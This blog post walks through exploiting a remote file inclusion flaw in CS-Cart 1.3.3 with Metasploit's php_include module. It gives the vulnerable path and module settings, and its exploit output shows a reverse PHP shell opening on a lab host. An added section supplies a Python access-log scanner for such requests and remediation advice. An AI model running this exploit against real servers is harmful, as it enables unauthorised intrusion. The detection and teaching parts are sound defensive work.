PHP include exploitation with Metasploit - Spentera Blog

PHP include exploitation with Metasploit

by Spentera / May 21, 2010

Metasploit supports PHP include exploitation, better known as RFI (Remote File Inclusion). I will show how this works against CS-Cart 1.3.3, which is vulnerable to remote file inclusion.

The vulnerable path is classes/phpmailer/class.cs_phpmailer.php?classes_dir=[location of arbitrary PHP code to include]

so in Metasploit, the PHPURI option will be set like this:

classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX

Let's see how this exploitation works.

msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

Name                     Rank       Description
----                     ----       -----------
unix/webapp/php_include  excellent  PHP Remote File Include Generic Exploit

msf exploit(php_include) > set payload php/reverse_php
payload => php/reverse_php
msf exploit(php_include) > show options

Module options:

Name        Current Setting                                                Required  Description
----        ---------------                                                --------  -----------
PATH        /commerce                                                      yes       The base directory to prepend to the URL to try
PHPRFIDB    /opt/metasploit3/msf3/data/exploits/php/rfi-locations.dat      no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI      classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX  no        The URI to request, with the include parameter changed to XXpathXX
Proxies                                                                    no        Use a proxy chain
RHOST       192.168.20.253                                                 yes       The target address
RPORT       80                                                             yes       The target port
SRVHOST     0.0.0.0                                                        yes       The local host to listen on.
SRVPORT     8080                                                           yes       The local port to listen on.
SSL         false                                                          no        Negotiate SSL for incoming connections
SSLVersion  SSL3                                                           no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                                                                    no        The URI to use for this exploit (default is random)
VHOST                                                                      no        HTTP server virtual host

Payload options (php/reverse_php):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The local address
LPORT  4444             yes       The local port

Exploit target:

Id  Name
--  ----
0   Automatic

msf exploit(php_include) >

Now we set the options.

msf exploit(php_include) > set PATH /commerce
PATH => /commerce
msf exploit(php_include) > set PHPURI /classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
PHPURI => /classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
msf exploit(php_include) > set RHOST 192.168.20.253
RHOST => 192.168.20.253

Once all required options are set, let's launch the exploit.

msf exploit(php_include) > exploit

[*] Started reverse handler on 192.168.20.243:4444
[*] Using URL: http://0.0.0.0:8080/vDcG9L
[*] Local IP: http://192.168.20.243:8080/vDcG9L
[*] PHP include server started.
[*] Sending /commerce/classes/phpmailer/class.cs_phpmailer.php?classes_dir=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%2e%32%34%33%3a%38%30%38%30%2f%76%44%63%47%39%4c%3f
[*] Command shell session 1 opened (192.168.20.243:4444 -> 192.168.20.253:2455) at 2010-05-21 11:36:45 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next steps are yours 😉
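The request Metasploit sent above carries the include parameter fully percent-encoded: classes_dir=%68%74%74%70... decodes to http://192.168.20.243:8080/vDcG9L?, which is the module's own PHP include server listed as "Local IP" in the output, so the target fetched and executed the payload from there. That encoded form is also exactly what a web server access log records, which is why a detection rule has to decode before it matches. The following is an added example, not code from the original post, from Metasploit or from CS-Cart: it parses combined-format access log lines, decodes include-style parameters (repeatedly, to catch double encoding) and flags values that name a remote URL or a PHP stream wrapper. The classes_dir parameter and the first request URI are taken from the post; the other parameter names, IP addresses and log lines are constructed for the example.

```python
"""Flag remote-file-inclusion attempts in web server access logs.

Added example for this post; it is not part of the original article,
of Metasploit or of CS-Cart. Only 'classes_dir' and the first request
URI below come from the post; every other parameter name and log line
is constructed for the example.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Query parameters that PHP applications commonly hand to include()/require().
# 'classes_dir' is the CS-Cart 1.3.3 parameter from the post; the rest are
# assumed common names, not taken from the page.
INCLUDE_PARAMS = {"classes_dir", "page", "file", "path", "include", "dir"}

# A legitimate include path never starts with a URL scheme or a PHP stream wrapper.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)
STREAM_WRAPPER = re.compile(r"^(?:php|data|phar)://", re.IGNORECASE)

# Apache/nginx combined log format: client, identd, user, [time], "METHOD URI PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing, so double-encoded
    payloads (%2568 -> %68 -> h) are normalised before inspection.
    The round limit keeps pathological input from looping."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_include_value(value):
    """Return (verdict, decoded_value) for one include-parameter value."""
    decoded = fully_decode(value)
    if REMOTE_SCHEME.match(decoded):
        return "remote_url", decoded
    if STREAM_WRAPPER.match(decoded):
        return "stream_wrapper", decoded
    return "ok", decoded


def scan_request_uri(uri):
    """Inspect every include-style parameter in a request URI.
    parse_qs already applies one round of percent-decoding; fully_decode
    handles anything that was encoded more than once."""
    findings = []
    query = urlsplit(uri).query
    for param, values in parse_qs(query, keep_blank_values=True).items():
        if param not in INCLUDE_PARAMS:
            continue
        for value in values:
            verdict, decoded = classify_include_value(value)
            if verdict != "ok":
                findings.append((param, verdict, decoded))
    return findings


def scan_log(lines):
    """Return one alert dict per suspicious include parameter seen in the log."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for param, verdict, decoded in scan_request_uri(m["uri"]):
            alerts.append({
                "src": m["ip"],
                "ts": m["ts"],
                "param": param,
                "verdict": verdict,
                "value": decoded,
                "status": int(m["status"]),
            })
    return alerts


# Constructed sample log. The first request URI is the one Metasploit sent in
# the post's exploit output; the surrounding log fields and the other two lines
# are made up for the example.
SAMPLE_LOG = [
    '192.168.20.243 - - [21/May/2010:11:36:45 +0700] "GET /commerce/classes/phpmailer/'
    'class.cs_phpmailer.php?classes_dir=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e'
    '%32%30%2e%32%34%33%3a%38%30%38%30%2f%76%44%63%47%39%4c%3f HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [21/May/2010:11:40:02 +0700] "GET /commerce/classes/phpmailer/'
    'class.cs_phpmailer.php?classes_dir=classes/phpmailer HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    # Double-encoded remote URL: %2568 -> %68 -> h; a single-pass decoder misses it.
    '10.0.0.9 - - [21/May/2010:11:41:10 +0700] "GET /index.php?page=%2568ttp://203.0.113.7/x '
    'HTTP/1.1" 500 0 "-" "curl/7.19"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["src"]} {alert["verdict"]} '
              f'{alert["param"]}={alert["value"]} (status {alert["status"]})')
```

Run it as a script to print the alerts for the embedded sample, or call scan_log() on lines read from a real access log. The status code is kept in each alert because a 200 on such a request, as in the post's session, means the include most likely succeeded. On the application side the durable fix is to never build an include path from request data (resolve it from a fixed allowlist instead) and to keep allow_url_include disabled in php.ini, which has been its default since the setting was introduced in PHP 5.2.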

Comments (2)

  • utkarsh / October 31, 2017

    Where did you get the path variable from? I see you have set it to /commerce; where did you get this?

    • Thomas Gregory / October 31, 2017

      Hi utkarsh, the /commerce came from my installation of the vulnerable CS-Cart 1.3.3. I pointed the CS-Cart root directory to /var/www/commerce, which is why it can be accessed at http://x.x.x.x/commerce. Hope this helps answer your question.
